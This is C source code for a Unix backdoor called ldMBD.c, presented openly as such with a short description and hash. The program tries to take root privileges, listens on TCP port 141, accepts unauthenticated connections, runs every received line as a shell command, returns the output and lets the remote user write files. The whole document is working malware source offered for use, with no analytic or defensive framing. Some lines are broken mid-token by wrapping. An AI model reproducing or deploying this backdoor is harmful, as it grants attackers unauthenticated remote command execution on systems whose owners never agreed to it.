ldM.c is a backdoor that runs on tcp port 141 by default.
c6299499912cbd9e814a5674cfc34c5a466c005cc3af22d93a7baed98fc365f9
/*
*
* ldM Security & Networking presents: ldMBD.c -- The lubracated backdoor.
* Designed and written by stdc (root@stackd.net).
*
*/
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <errno.h>
#include <unistd.h>
#include <netinet/in.h>
#include <limits.h>
#include <netdb.h>
#include <arpa/inet.h>
#define MAX_CLIENTS 3
#define TMP_FILE "/tmp/sh"
#define PORT_NUM 141
#define CATBUF 4000
int get_connection(socket_type, port, listener)
int socket_type;
int port;
int *listener;
{
struct sockaddr_in address;
struct sockaddr_in acc;
int listening_socket;
int connected_socket = -1;
int new_process;
int reuse_addr = 1;
int acclen=sizeof(acc);
memset((char *) &address, 0, sizeof(address));
address.sin_family = AF_INET;
address.sin_port = htons(port);
address.sin_addr.s_addr = htonl(INADDR_ANY);
listening_socket = socket(AF_INET, socket_type, 0);
if (listening_socket < 0) {
perror("socket");
exit(1);
}
if (listener != NULL) *listener = listening_socket;
setsockopt(listening_socket,SOL_SOCKET,SO_REUSEADDR,
(void *)&reuse_addr,sizeof(reuse_addr));
if (bind(listening_socket,(struct sockaddr *)&address,sizeof(address))<0)
{
perror("bind");
close(listening_socket);
exit(1);
}
if (socket_type == SOCK_STREAM){
listen(listening_socket, MAX_CLIENTS);
while(connected_socket < 0){
connected_socket = accept(listening_socket, &acc, &acclen
);
if (connected_socket < 0){
if (errno != EINTR){
perror("accept");
close(listening_socket);
exit(1);
}else continue;
}
new_process=fork();
if (new_process<0){
perror("fork");
close(connected_socket);
connected_socket = -1;
}else{
if (new_process == 0) {
close(listening_socket);
if (listener!=NULL) *listener = -1;
}else{
close(connected_socket);
connected_socket = -1;
}
}
}
return connected_socket;
}else return listening_socket;
}
int sock_write(sockfd, buf, count)
int sockfd;
char *buf;
size_t count;
{
size_t bytes_sent = 0;
int this_write;
while (bytes_sent < count) {
do
this_write = write(sockfd, buf, count - bytes_sent);
while ( (this_write < 0) && (errno == EINTR) );
if (this_write <= 0)
return this_write;
bytes_sent += this_write;
buf += this_write;
}
return count;
}
int sock_gets(sockfd, str, count)
int sockfd;
char *str;
size_t count;
{
int bytes_read;
int total_count = 0;
char *current_position;
char last_read = 0;
current_position = str;
while (last_read != 10) {
bytes_read = read(sockfd, &last_read, 1);
if (bytes_read <= 0) return -1;
if ((total_count<count)&&(last_read!=10)&&(last_read!=13)){
current_position[0] = last_read;
current_position++;
total_count++;
}
}
if (count > 0)
current_position[0] = 0;
return total_count;
}
int sock_puts(sockfd, str)
int sockfd;
char *str;
{
int sock_write();
char buf[2000];
sprintf(buf,"\r%s",str);
return sock_write(sockfd, buf, strlen(buf));
}
int main(argc, argv)
int argc;
char *argv[];
{
int get_connection();
int sock_gets();
int sock_puts();
int c,f,i;
FILE *fp;
int sock;
int connected = 1;
char buffer[1024];
char buf2[CATBUF];
char cdir[2000];
char cstdir[2000];
static int textmode=0;
static int listensock = -1;
setuid(0);
setgid(0);
sock = get_connection(SOCK_STREAM, PORT_NUM, &listensock);
sock_puts(sock,"Welcome. This is the ldM Backdoor.\n");
sock_puts(sock,"ldM Security Inc. - Written by stdc.\n");
sock_puts(sock,"Questions? Comments? root@stackd.net\n");
sprintf(buf2,"pwd > %s",TMP_FILE);
system(buf2);
if ((fp=fopen(TMP_FILE,"r"))==NULL)
strcpy(cdir,"/");
else{
fscanf(fp,"%s",cdir);
fclose(fp);
}
strcpy(cstdir,cdir);
sprintf(buf2,"%s\n",cdir);
sock_puts(sock,buf2);
while (connected) {
if (textmode==0) sock_puts(sock,"root@lubracated?:~#");
if ( sock_gets(sock, buffer, 1024) < 0) {
connected = 0;
}else{
if (strcmp(buffer,"$eof")==0){
textmode=0;
if (fp!=NULL) fclose(fp);
continue;
}
if (textmode==1){
if (fp!=NULL){
fwrite(buffer,1,strlen(buffer),fp);
putc('\n',fp);
}
continue;
}
if (strcmp(buffer,"logout")==0 || strcmp(buffer,"exit")==
0 ) break;
if (strncmp(buffer,"$mktext",7)==0){
if (strlen(buffer)<9){
sock_puts(sock,"usage : $mktext [filename
]\n");
}else{
if ((fp=fopen(buffer+8,"wb"))==NULL)
sock_puts(sock,"File write error\
n");
else{
textmode=1;
continue;
}
}
}
if (strcmp(buffer,"cd")==0){
sprintf(cdir,cstdir);
sprintf(buf2,"%s\n",cdir);
sock_puts(sock,buf2);
continue;
}
if (strncmp(buffer,"cd ",3)==0){
strcpy(buf2,buffer+3);
if (buf2[0]=='/'){
strcpy(cdir,buf2);
sprintf(buf2,"%s\n",cdir);
}else{
strcat(cdir,"/"); strcat(cdir,buf2);
sprintf(buf2,"%s\n",cdir);
}
sock_puts(sock,buf2);
continue;
}
sprintf(buf2,"csh -f -c \"cd %s;%s\" > %s",cdir,buffer,TM
P_FILE);
system(buf2);
if ((fp=fopen(TMP_FILE,"rb"))!=NULL){
for (;;){
if (feof(fp)) break;
for (i=0;i<2000;i++){
if (feof(fp)) break;
c=getc(fp);
if (c=='\n') break;
else buf2[i]=c;
}
buf2[i]=0;
strcat(buf2,"\n");
sock_puts(sock,buf2);
}
fclose(fp);
}
remove("/tmp/.ush");
}
}
close(sock);
return 0;
}